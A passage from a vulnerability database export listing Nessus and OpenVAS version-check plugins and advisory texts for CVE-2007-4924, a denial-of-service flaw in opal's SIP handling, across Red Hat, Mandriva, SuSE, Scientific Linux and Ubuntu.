\"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"opal-2.2.2-1.1.0.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"opal-devel-2.2.2-1.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:10:16", "bulletinFamily": "scanner", "description": "A flaw in opal, the Open Phone Abstraction Library, was found in how it handles certain Session Initiation Protocol (SIP) packets. An attacker could use this vulnerability to crash an application linked to opal, such as Ekiga.\n\nUpdated packages have been patched to prevent these issues.", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2007-205.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27623", "published": "2007-11-05T00:00:00", "title": "Mandrake Linux Security Advisory : opal (MDKSA-2007:205)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:205. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27623);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 20:59:14\");\n\n script_cve_id(\"CVE-2007-4924\");\n script_xref(name:\"MDKSA\", value:\"2007:205\");\n\n script_name(english:\"Mandrake Linux Security Advisory : opal (MDKSA-2007:205)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw in opal, the Open Phone Abstraction Library, was found in how\nit handles certain Session Initiation Protocol (SIP) packets. An\nattacker could use this vulnerability to crash an application linked\nto opal, such as Ekiga.\n\nUpdated packages have been patched to prevent these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64opal2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64opal2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopal2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopal2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64opal2-2.2.3-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64opal2-devel-2.2.3-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopal2-2.2.3-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopal2-devel-2.2.3-1.1mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64opal2-2.2.6-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64opal2-devel-2.2.6-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libopal2-2.2.6-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libopal2-devel-2.2.6-1.1mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:10:06", "bulletinFamily": "scanner", "description": "Updated opal packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nOpen Phone Abstraction Library (opal) is implementation of various telephony and video communication protocols for use over packet based networks.\n\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\n\nA flaw was discovered in the way opal handled certain Session Initiation Protocol (SIP) packets. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with opal.\n(CVE-2007-4924)\n\nUsers should upgrade to these updated opal packages which contain a backported patch to correct this issue.", "modified": "2018-11-16T00:00:00", "id": "REDHAT-RHSA-2007-0957.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=26955", "published": "2007-10-09T00:00:00", "title": "RHEL 5 : opal (RHSA-2007:0957)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0957. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26955);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-4924\");\n script_xref(name:\"RHSA\", value:\"2007:0957\");\n\n script_name(english:\"RHEL 5 : opal (RHSA-2007:0957)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated opal packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nOpen Phone Abstraction Library (opal) is implementation of various\ntelephony and video communication protocols for use over packet based\nnetworks.\n\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\n\nA flaw was discovered in the way opal handled certain Session\nInitiation Protocol (SIP) packets. An attacker could use this flaw to\ncrash an application, such as Ekiga, which is linked with opal.\n(CVE-2007-4924)\n\nUsers should upgrade to these updated opal packages which contain a\nbackported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0957\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected opal and / or opal-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:opal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:opal-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0957\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"opal-2.2.2-1.1.0.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"opal-2.2.2-1.1.0.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"opal-devel-2.2.2-1.1.0.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"opal-devel-2.2.2-1.1.0.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opal / opal-devel\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:10:32", "bulletinFamily": "scanner", "description": "A bug in the SIP protocol handler could be exploited by attackers to crash applications using opal. (CVE-2007-4924)", "modified": "2012-05-17T00:00:00", "id": "SUSE_OPAL-4519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29532", "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : opal (ZYPP Patch Number 4519)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29532);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:20:15 $\");\n\n script_cve_id(\"CVE-2007-4924\");\n\n script_name(english:\"SuSE 10 Security Update : opal (ZYPP Patch Number 4519)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in the SIP protocol handler could be exploited by attackers to\ncrash applications using opal. (CVE-2007-4924)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-4924.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4519.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"opal-2.2.5-0.12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-04T11:28:52", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-562-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840216", "id": "OPENVAS:840216", "title": "Ubuntu Update for opal vulnerability USN-562-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_562_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for opal vulnerability USN-562-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Jose Miguel Esparza discovered that certain SIP headers were not correctly\n validated. A remote attacker could send a specially crafted packet to\n an application linked against opal (e.g. Ekiga) causing it to crash, leading\n to a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-562-1\";\ntag_affected = \"opal vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-562-1/\");\n script_id(840216);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"562-1\");\n script_cve_id(\"CVE-2007-4924\");\n script_name( \"Ubuntu Update for opal vulnerability USN-562-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libopal\", ver:\"2.2.0_2.2.3.dfsg-2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-dbg\", ver:\"2.2.3.dfsg-2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-dev\", ver:\"2.2.3.dfsg-2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"simpleopal\", ver:\"2.2.3.dfsg-2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-doc\", ver:\"2.2.3.dfsg-2ubuntu2.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libopal\", ver:\"2.2.0_2.2.1-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-dbg\", ver:\"2.2.1-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-dev\", ver:\"2.2.1-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"simpleopal\", ver:\"2.2.1-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-doc\", ver:\"2.2.1-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libopal\", ver:\"2.2.0_2.2.3.dfsg-0ubuntu2.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-dbg\", ver:\"2.2.3.dfsg-0ubuntu2.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-dev\", ver:\"2.2.3.dfsg-0ubuntu2.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"simpleopal\", ver:\"2.2.3.dfsg-0ubuntu2.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libopal-doc\", ver:\"2.2.3.dfsg-0ubuntu2.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:41", "bulletinFamily": "scanner", "description": "Check for the Version of opal", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830308", "id": "OPENVAS:830308", "title": "Mandriva Update for opal MDKSA-2007:205 (opal)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for opal MDKSA-2007:205 (opal)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw in opal, the Open Phone Abstraction Library, was found in\n how it handles certain Session Initiation Protocol (SIP) packets.\n An attacker could use this vulnerability to crash an application\n linked to opal, such as Ekiga.\n\n Updated packages have been patched to prevent these issues.\";\n\ntag_affected = \"opal on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-11/msg00002.php\");\n script_id(830308);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:00:25 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDKSA\", value: \"2007:205\");\n script_cve_id(\"CVE-2007-4924\");\n script_name( \"Mandriva Update for opal MDKSA-2007:205 (opal)\");\n\n script_summary(\"Check for the Version of opal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopal2\", rpm:\"libopal2~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopal2-devel\", rpm:\"libopal2-devel~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opal\", rpm:\"opal~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2\", rpm:\"lib64opal2~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2-devel\", rpm:\"lib64opal2-devel~2.2.6~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopal2\", rpm:\"libopal2~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopal2-devel\", rpm:\"libopal2-devel~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opal\", rpm:\"opal~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2\", rpm:\"lib64opal2~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opal2-devel\", rpm:\"lib64opal2-devel~2.2.3~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:17", "bulletinFamily": "scanner", "description": "Check for the Version of opal", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830308", "id": "OPENVAS:1361412562310830308", "type": "openvas", "title": "Mandriva Update for opal MDKSA-2007:205 (opal)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for opal MDKSA-2007:205 (opal)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw in opal, the Open Phone Abstraction Library, was found in\n how it handles certain Session Initiation Protocol (SIP) packets.\n An attacker could use this vulnerability to crash an application\n linked to opal, such as Ekiga.\n\n Updated packages have been patched to prevent these issues.\";\n\ntag_affected = \"opal on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated 